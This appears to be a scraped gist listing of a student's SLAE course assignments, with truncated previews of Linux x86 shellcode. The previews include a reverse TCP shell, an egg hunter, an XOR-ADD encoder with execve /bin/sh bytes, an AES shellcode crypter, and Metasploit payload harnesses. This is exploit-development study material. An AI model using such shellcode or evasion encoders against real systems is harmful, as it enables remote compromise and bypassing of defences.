This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # Author: Shubham Singh | |
| # Student ID: SLAE - 1342 | |
| from Crypto.Cipher import AES | |
| from Crypto import Random | |
| import base64,sys,binascii,os,getopt | |
| # Argument List | |
| argumentList = sys.argv[1:] | |
| # Options |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;SLAE-1342 | |
| ;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-758.php | |
| global _start | |
| section .text | |
| _start: | |
| xor ecx,ecx ;Anything xor with itself would result zero | |
| mul ecx ;The classic use of mul instruction. Now the eax:edx will become 0 | |
| push edx ;push nulls on stack |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;SLAE-1342 | |
| ;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-542.php | |
| global _start | |
| section .text | |
| _start: | |
| jmp short ok ;jump to ok | |
| okk: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| # Title: linux/x86/shell_reverse_tcp (Metasploit) | |
| # Tested on: x86 GNU/Linux | |
| #Student ID: SLAE - 1342 | |
| */ | |
| #include<stdio.h> | |
| #include<string.h> | |
| unsigned char buf[] = | |
| "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| # Title: linux/x86/read_file Shellcode (Metasploit) | |
| # Tested on: x86 GNU/Linux | |
| #Student ID: SLAE - 1342 | |
| */ | |
| #include<stdio.h> | |
| #include<string.h> | |
| unsigned char buf[] = | |
| "\xeb\x36\xb8\x05\x00\x00\x00\x5b\x31\xc9\xcd\x80\x89\xc3\xb8" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| # Title: linux/x86/chmod Shellcode (Metasploit) | |
| # Tested on: x86 GNU/Linux | |
| #Student ID: SLAE - 1342 | |
| */ | |
| #include<stdio.h> | |
| #include<string.h> | |
| unsigned char buf[] = |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Simple XOR-ADD encoder | |
| #SLAE - 1342 | |
| import sys | |
| import binascii | |
| a = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") | |
| b = bytes(a) | |
| e = "" | |
| e1 = "" | |
| for x in bytearray(b): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Author: Shubham Singh | |
| ; SLAE - 1342 | |
| ; Assignment 2: Custom Encoding Scheme Decoder Shellcode / Linux x86 | |
| global _start | |
| section .text | |
| _start: | |
| ;Classic usage of JMP-CALL-POP Technique | |
| jmp short call_shellcode ;Take a short jump to call_shellcode |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| # Title: Linux/x86 - EggHunter + Null-Free Shellcode (33 Bytes) | |
| # Author: Shubham Singh | |
| # Tested on: x86 GNU/Linux | |
| # Shellcode Length: 33 Bytes | |
| #Student ID: SLAE - 1342 | |
| #Description: Null-Free Egg Hunter Shellcode - 33 Bytes | |
| #file format elf32-i386 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Author: Shubham Singh | |
| ; SLAE - 1342 | |
| ; Assignment 2: Shell Reverse TCP Shellcode / Linux x86 (83 Bytes) | |
| global _start | |
| section .text | |
| _start: | |
| ;socket(AF_INET, SOCK_STREAM, 0) | |
| ;socket(2,1,0) |
NewerOlder